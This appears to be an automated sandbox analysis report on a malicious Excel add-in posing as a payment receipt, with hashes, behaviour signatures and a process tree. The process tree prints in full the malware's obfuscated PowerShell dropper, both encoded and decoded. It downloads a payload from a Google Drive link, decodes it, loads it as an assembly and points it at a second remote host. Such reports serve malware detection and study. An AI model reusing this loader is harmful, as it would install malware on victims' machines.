Analysis
-
max time kernel
122s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
-
submitted
23-10-2024 09:55
General
-
Target
Comprobantedepago.xlam
-
Size
699KB
-
MD5
1de5993784350cdba2bdc8824591a452
-
SHA1
921e7dd625709bbef00860eb23c9bc279e3483d6
-
SHA256
d60d2060e90ae46091f0d4d2cd819c87ab7832b50ed4ba05912281ec084d7748
-
SHA512
db4e29d683e16fde32f14d5e9229b29ca20fac16f247f36b3dfd69f137bddadd0d4f6f39cbe5b0c07b26d6c979c1bfb8d97dd93bf8c6852f7ec3e7069e976cfa
-
SSDEEP
12288:TTDYEkIOk9iewJ5IU5Y3LoIfpo3Scp1ixHXmYWN0jPvxfScWgGYDpBY3:fDYVkQT5IP7oXCcfixBWN0jPvxfCag3
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
https://drive.google.com/uc?export=download&id=1-Wdgeq0fX9aApdlSW9dln1Pc_KEGpfHp
exe.dropper
https://drive.google.com/uc?export=download&id=1-Wdgeq0fX9aApdlSW9dln1Pc_KEGpfHp
Signatures
-
Blocklisted process makes network request 5 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Drops file in System32 directory 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Enumerates system info in registry 2 TTPs 1 IoCs
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of SetWindowsHookEx 3 IoCs
-
Suspicious use of WriteProcessMemory 12 IoCs
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\Comprobantedepago.xlam1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Tuesdaycrypt.vbs"2⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'aWV4ICgoKCdWVW5pbWFnZVVybCA9IHZyaWh0JysndHBzOi8vZHJpdmUuZ29vZ2xlLmNvbS91Yz9leHBvcnQ9ZG93bmxvYWQmaWQ9MS1XJysnZGdlcTBmWDlhQXBkbFNXOWRsbjFQY19LRUdwZkhwIHZyaTtWVW53ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O1ZVbmltYWdlQnl0ZXMgPSBWVW53ZWJDbGllbnQuRG93bmxvYWREYXRhKFZVbmltYWdlVXJsKTtWVW5pbWEnKydnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhWVW5pbWFnZScrJ0J5JysndGVzKTtWVW5zdGFydEZsYWcgPScrJyB2cicrJ2k8PEJBU0U2NF9TVEFSVD4+dnJpO1ZVbmVuZEZsYWcgPSB2cmk8PEJBU0U2NF9FTkQ+PnZyaTtWVW5zdGEnKydydEluZGV4ID0gVlUnKyduaW1hZ2VUZXh0LkluZGV4T2YoVlVuc3RhcnRGbGFnKScrJztWVW5lbmRJbicrJ2RleCA9IFZVbmltYWdlVGV4dC5JbmRleE9mKFZVbmVuZEZsYWcpO1ZVbnN0YXJ0SW5kZXggJysnLWdlIDAgLWFuZCBWVW5lbmRJbmQnKydleCAtJysnZ3QgVlVuc3RhcnRJbmRleDtWVW5zdGFydEluZGV4ICs9IFZVbnN0YXJ0RmxhZy5MZW5ndGg7VicrJ1VuYmFzZTY0TGVuZ3RoID0nKycgVlVuZW5kSW5kZScrJ3ggLSBWVW5zdGFyJysndEluZGV4O1ZVbmJhc2U2NENvbW1hbmQnKycgPSBWVW5pbWFnZVRleHQuU3ViJysnc3QnKydyaW5nKFZVbnN0YXJ0SW5kZXgsIFZVbicrJ2Jhc2U2NExlbmd0aCk7JysnVlVuYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoVlVuYmFzZTY0Q29tbWFuZC5UbycrJ0MnKydoYXJBcnJheSgpIGpZQSBGb3JFYWNoLU9iJysnamVjdCB7IFZVbl8gfSlbLTEuLi0oVlVuYmEnKydzZTY0Q29tbWFuZC5MZW5ndGgpXTtWVW5jb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcicrJ29tQmFzJysnZTY0U3RyaW5nKFZVbmJhc2U2NFJldmVyc2VkKScrJztWVW5sb2FkZWRBc3NlbWJseSA9IFtTJysneXN0ZW0uUmVmbGVjdGlvbi5Bc3MnKydlbWJseV06OkxvYWQoVlVuY29tbWFuZEJ5dGVzKTtWVW52YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TScrJ2V0aG9kKHZyJysnaVZBSXZyaSk7VlVudmFpTWV0aG9kLkludm9rZShWVW5udWxsLCBAKHZyaScrJ3R4dC5ZQURTRVVULzI0MS42MTIuMy4yOTEvLzpwdHRodnJpLCB2cmlkZXNhdGl2YWRvdnJpLCB2cmlkZXNhdGl2YWRvdnJpLCB2cmlkZXNhdGl2YWRvdnJpLCB2cmlBZGRJblByb2Nlc3MzMnZyaSwgdnJpZGVzYXRpdmEnKydkb3ZyaSwgdnJpZGVzYXRpdmFkb3ZyaSx2cml2cmksdnJpdnJpLHZyaXZyaSx2cml2cmksdnJpdnJpLHZyaTF2cmkpKTsnKSAtcmVwbEFjRSAoW0NoQXJdMTE4K1tDaEFyXTExNCtbQ2hBcl0xMDUpLFtDaEFyXTM5IC1jckVQTGFjRSAnallBJyxbQ2hBcl0xMjQgIC1yZXBsQWNFIChbQ2hBcl04NitbQ2hBcl04NStbQ2hBcl0xMTApLFtDaEFyXTM2KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "iex ((('VUnimageUrl = vriht'+'tps://drive.google.com/uc?export=download&id=1-W'+'dgeq0fX9aApdlSW9dln1Pc_KEGpfHp vri;VUnwebClient = New-Object System.Net.WebClient;VUnimageBytes = VUnwebClient.DownloadData(VUnimageUrl);VUnima'+'geText = [System.Text.Encoding]::UTF8.GetString(VUnimage'+'By'+'tes);VUnstartFlag ='+' vr'+'i<<BASE64_START>>vri;VUnendFlag = vri<<BASE64_END>>vri;VUnsta'+'rtIndex = VU'+'nimageText.IndexOf(VUnstartFlag)'+';VUnendIn'+'dex = VUnimageText.IndexOf(VUnendFlag);VUnstartIndex '+'-ge 0 -and VUnendInd'+'ex -'+'gt VUnstartIndex;VUnstartIndex += VUnstartFlag.Length;V'+'Unbase64Length ='+' VUnendInde'+'x - VUnstar'+'tIndex;VUnbase64Command'+' = VUnimageText.Sub'+'st'+'ring(VUnstartIndex, VUn'+'base64Length);'+'VUnbase64Reversed = -join (VUnbase64Command.To'+'C'+'harArray() jYA ForEach-Ob'+'ject { VUn_ })[-1..-(VUnba'+'se64Command.Length)];VUncommandBytes = [System.Convert]::Fr'+'omBas'+'e64String(VUnbase64Reversed)'+';VUnloadedAssembly = [S'+'ystem.Reflection.Ass'+'embly]::Load(VUncommandBytes);VUnvaiMethod = [dnlib.IO.Home].GetM'+'ethod(vr'+'iVAIvri);VUnvaiMethod.Invoke(VUnnull, @(vri'+'txt.YADSEUT/241.612.3.291//:ptthvri, vridesativadovri, vridesativadovri, vridesativadovri, vriAddInProcess32vri, vridesativa'+'dovri, vridesativadovri,vrivri,vrivri,vrivri,vrivri,vrivri,vri1vri));') -replAcE ([ChAr]118+[ChAr]114+[ChAr]105),[ChAr]39 -crEPLacE 'jYA',[ChAr]124 -replAcE ([ChAr]86+[ChAr]85+[ChAr]110),[ChAr]36) )"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7KB
MD54ddc65913d5f2efb9fab181fe2d3ddae
SHA1e370394c3af30ef25246eded98418ffa640d2ebc
SHA25603ae781f0591330112dde9462e130633a84d4c49ceb5db2e0c43725c2a509b26
SHA512a4936d32e2ad14747a84eeef0866b0ac74cc3c95c12d80e698414d3957349fe2df9ca21f39a1d07335d80b0d85ddf8636ec31e3b595215b8de66c900a5e1c949
-
Filesize
2KB
MD552657fa0314283cd353ff9d0f9abae4a
SHA1779272a13a18ba73e34c1a7e49fc1d3a3a4c17c6
SHA256b6dca2c1ab2a430f18a5c98e6c626a9120ca36b5cf6c35b80bdab46b2482aa0a
SHA512eef4a2ff2eb2d4f936e15eeb6719a35d4ecba4ad1e38dbb46eaa9a98953052db171189712503e8994b2a6e2e9d1f319de9e0706be72306c06436c8437e836171
-
Filesize
64KB
-
Filesize
44KB
-
Filesize
44KB